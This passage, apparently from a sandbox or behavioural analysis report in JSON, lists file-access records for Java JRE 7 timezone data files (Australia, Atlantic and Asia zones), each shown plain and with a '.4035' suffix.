"hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\hobart.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Hobart", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\hobart", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lindeman.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lindeman.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lindeman", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lindeman", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lord_Howe.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lord_howe.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lord_Howe", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lord_howe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Melbourne.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\melbourne.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Melbourne", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\melbourne", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Perth.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\perth.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Perth", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\perth", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Sydney.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\sydney.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Sydney", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\sydney", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Azores.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\azores.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Azores", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\azores", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Bermuda.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\bermuda.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Bermuda", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\bermuda", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Canary.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\canary.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Canary", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\canary", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Cape_Verde.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\cape_verde.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Cape_Verde", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\cape_verde", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Faroe.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\faroe.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Faroe", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\faroe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Madeira.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\madeira.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Madeira", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\madeira", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Reykjavik.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\reykjavik.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Reykjavik", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\reykjavik", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\South_Georgia.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\south_georgia.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\South_Georgia", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\south_georgia", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Stanley.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\stanley.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Stanley", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\stanley", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\St_Helena.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\st_helena.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\St_Helena", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\st_helena", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aden.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aden.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aden", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aden", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Almaty.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\almaty.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Almaty", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\almaty", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Amman.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\amman.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Amman", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\amman", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Anadyr.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\anadyr.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Anadyr", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\anadyr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtau.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtau.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtau", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtau", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtobe.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtobe.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtobe", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtobe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ashgabat.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ashgabat.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ashgabat", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ashgabat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baghdad.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baghdad.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baghdad", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baghdad", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bahrain.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bahrain.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bahrain", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bahrain", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baku.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baku.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Baku", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\baku", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bangkok.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bangkok.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bangkok", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bangkok", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Beirut.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\beirut.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Beirut", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\beirut", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bishkek.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bishkek.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bishkek", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bishkek", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Brunei.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\brunei.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Brunei", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\brunei", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Choibalsan.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\choibalsan.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Choibalsan", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\choibalsan", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Chongqing.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\chongqing.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Chongqing", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\chongqing", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Colombo.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\colombo.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Colombo", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\colombo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Damascus.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\damascus.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Damascus", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\damascus", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dhaka.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dhaka.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dhaka", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dhaka", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dili.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dili.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dili", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dili", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dubai.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dubai.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dubai", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dubai", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dushanbe.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dushanbe.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dushanbe", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dushanbe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Gaza.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\gaza.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Gaza", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\gaza", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Harbin.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\harbin.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Harbin", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\harbin", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hebron.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hebron.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hebron", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hebron", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hong_Kong.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hong_kong.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hong_Kong", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hong_kong", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hovd.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hovd.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Hovd", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\hovd", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ho_Chi_Minh.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ho_chi_minh.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ho_Chi_Minh", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ho_chi_minh", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Irkutsk.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\irkutsk.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Irkutsk", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\irkutsk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jakarta.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jakarta.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jakarta", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jakarta", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jayapura.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jayapura.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jayapura", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jayapura", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jerusalem.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jerusalem.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jerusalem", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jerusalem", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kabul.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kabul.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kabul", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kabul", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kamchatka.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kamchatka.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kamchatka", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kamchatka", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Karachi.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\karachi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Karachi", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\karachi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kashgar.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kashgar.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kashgar", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kashgar", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kathmandu.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kathmandu.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kathmandu", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kathmandu", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Khandyga.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\khandyga.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Khandyga", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\khandyga", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kolkata.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kolkata.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kolkata", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kolkata", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Krasnoyarsk.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\krasnoyarsk.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Krasnoyarsk", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\krasnoyarsk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuala_Lumpur.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuala_lumpur.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuala_Lumpur", "hashes": [], "norm_filename": 